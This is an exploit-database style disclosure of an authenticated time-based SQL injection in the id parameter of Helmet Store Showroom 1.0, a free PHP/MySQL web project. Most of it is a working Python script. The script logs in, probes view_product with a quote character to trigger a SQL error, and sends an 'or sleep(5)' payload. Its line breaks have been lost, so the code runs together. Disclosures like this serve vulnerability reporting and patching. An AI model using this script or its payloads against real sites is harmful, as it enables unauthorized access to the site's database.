Helmet Store Showroom 1.0 SQL Injection

# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection# Date: 25-11-2022# Exploit Author: syad# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 + XAMPP 3.2.4# CVE ID : N/A# Description# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.import requestsimport sysimport pyfigletsess = requests.Session()proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}def login1(ip,username,password):    x  = "http://%s/hss/classes/Login.php?f=login" % ip    login = {'username':username, 'password':password}    r = sess.post(x, data=login, proxies=proxies)    #print(r.content)def login(ip):    x = ("http://%s/hss/admin") % ip    r = sess.get(x,proxies=proxies)    if "Welcome to Helmet Store Showroom - PHP" in r.text:        print("--------------------------------------------")        print("[+] Success Login")    def detect_sql(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip    r = sess.get(x,proxies=proxies)    if "You have an error in your SQL syntax" in r.text:        print("[+] Found SQL Error")    def time_based_sqli(ip):    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip    r = sess.get(x,proxies=proxies)    print("[+] Time Based SQL Found")    print("[*]!!! Time To Report !!!")    if __name__ == "__main__":    result = pyfiglet.figlet_format("PWN")    print(result)    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()    except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])        sys.exit(-1)login1(ip,username,password)login(ip)detect_sql(ip)time_based_sqli(ip)